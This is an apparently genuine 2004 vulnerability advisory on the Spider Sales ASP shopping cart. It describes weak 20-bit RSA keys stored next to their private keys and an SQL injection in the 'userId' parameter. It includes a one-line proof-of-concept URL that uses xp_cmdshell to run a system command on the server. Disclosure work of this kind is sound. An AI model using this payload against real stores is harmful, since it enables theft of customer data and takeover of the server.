S-Quadra Advisory #2004-03-03

Topic: Spider Sales shopping cart software multiple security vulnerabilities
Severity: High
Vendor URL: http://www.spidersales.com
Advisory URL: http://www.s-quadra.com/advisories/Adv-20040303.txt
Release date: 03 Mar 2004

1. DESCRIPTION

"Spider Sales is a powerful shopping cart solution designed for small,
medium or large enterprises who want to sale their products on the
Internet market. You can use it to build any kind of Internet shop and
virtually sell anything." spidersales.com site says. It's written on
ASP, works on most Windows platforms and uses MS Access, MS SQL Server
or MySQL Server as a backend. Please visit http://www.spidersales.com
for more information about this shopping cart.

2. DETAILS

-- Vulnerability 1: Incorrect use of cryptography

Spider Sales shopping cart software uses RSA cryptosystem to encrypt
sensitive data before storing it in a database. The RSA cryptosystem is
a public-key cryptosystem that offers both encryption and digital
signatures (authentication). Please read
http://www.rsasecurity.com/rsalabs/faq/3-1-1.html for more information
about RSA cryptosystem. In the Spider Sales shopping cart software the
maximum length of the modulus n is equal to 20 bits and don't have
minimum lenght limit, so it is easy for attacker to factor n into p and
q and obtain the private key d. Moreover, the private key is stored in
the same database and in the same table where a public key is. So an
attacker can decrypt any protected information if he gains access to
store's database.

-- Vulnerability 2: SQL Injection vulnerability

Substantial number of scripts in Spider Sales software don't filter
'userId' parameter, which can be used by attacker for modifying SQL
query and perform some of SQL injection attacks.

Successfull exploitation of this vulnerability could allow an attacker
to gain access to Spider Sales administrator interface and read any
information from store's database (i.e. customers private data). Also an
attacker could execute commands using xp_cmdshell function.

--PoC code

--Vulnerability 2:

Platform: MS SQL Server as a backend

The following request executes dir c: command and saves result in
c:\inetpub\wwwroot\dirc.txt file

http://[target]/Carts/Computers/viewCart.asp?userID=2893225125722634';exec%20master..xp_cmdshell%20'dir%20c:%20>%20c:\inetpub\wwwroot\dirc.txt'--&viewID=48

3. FIX INFORMATION

S-Quadra alerted Spider Sales development team to these issues on 25
Feb 2004. No response has been received. No fix information has been
provided.

4. CREDITS

Nick Gudov <cipher@s-quadra.com> has detected above mentioned
vulnerabilities.

5. ABOUT

S-Quadra dedicates its substantial knowledge and resources to managing
clients' IT security risks. S-Quadra audits and protection for software
and networks implent pioneering methods and ground-breaking
technologies.

           S-Quadra Advisory #2004-03-03